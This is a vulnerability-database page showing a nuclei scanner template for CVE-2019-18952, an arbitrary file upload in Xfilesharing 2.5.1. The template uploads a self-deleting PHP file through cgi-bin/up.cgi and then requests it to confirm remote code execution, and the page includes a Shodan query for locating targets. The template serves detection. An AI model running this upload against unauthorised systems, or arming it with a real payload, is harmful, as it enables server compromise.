Lucene search
K

Xfilesharing 2.5.1 - Arbitrary File Upload

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Xfilesharing 2.5.1 allows arbitrary file upload enabling remote code execution with CVE-2019-18951.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Xfilesharing 2.5.1 - Arbitrary File Upload Vulnerability
14 Nov 201900:00
zdt
ATTACKERKB
CVE-2019-18952
13 Nov 201900:00
attackerkb
Circl
CVE-2019-18951
17 Jun 202100:48
circl
Circl
CVE-2019-18952
6 Feb 202520:43
circl
CNVD
SibSoft Xfilesharing File Upload Vulnerability
14 Nov 201900:00
cnvd
CNVD
SibSoft Xfilesharing Directory Traversal Vulnerability
14 Nov 201900:00
cnvd
CVE
CVE-2019-18951
13 Nov 201922:38
cve
CVE
CVE-2019-18952
13 Nov 201922:38
cve
Cvelist
CVE-2019-18951
13 Nov 201922:38
cvelist
Cvelist
CVE-2019-18952
13 Nov 201922:38
cvelist
Rows per page
id: CVE-2019-18952

info:
  name: Xfilesharing 2.5.1 - Arbitrary File Upload
  author: daffainfo
  severity: critical
  description: |
    SibSoft Xfilesharing through 2.5.1 allows cgi-bin/up.cgi arbitrary file upload.This can be combined with CVE-2019-18951 to achieve remote code execution via a .html file, containing short codes, that is served over HTTP.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact:
    Attackers can upload malicious files and execute arbitrary code remotely, leading to full system compromise.
  reference:
    - https://www.exploit-db.com/exploits/47659
    - https://gist.github.com/pak0s/af9f640170aed335fdf6d110d468dbce
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-18952
    cwe-id: CWE-434
    epss-score: 0.45361
    epss-percentile: 0.98633
    cpe: cpe:2.3:a:sibsoft:xfilesharing:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sibsoft
    product: xfilesharing
    shodan-query: html:"/?op=registration" "OpenSSL"
  tags: cve,cve2019,sibsoft,xfilesharing,rce,file-upload,intrusive,vkev,vuln

flow: http(1) && http(2)

variables:
  num: "999999999"
  path: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /cgi-bin/up.cgi HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337

        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="sid"

        {{path}}
        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: application/php

        <?php
        echo md5('{{num}}');
        unlink(__FILE__);
        ?>
        -----------------------------5825462663702204104870787337--

    matchers:
      - type: word
        words:
          - "<OK>"
        internal: true

  - raw:
      - |
        GET /cgi-bin/temp/{{path}}/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "{{md5(num)}}"
# digest: 4a0a0047304502207c801b8c37e89ea9ca326ff08f66ad9cfd6546ddf8b69ae742a70c0f989de330022100a1e5c2c39dc38272dd4a70b84e770086ab936716578827e43fd909b684212d6e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
CVSS 3.19.8
EPSS0.45361
12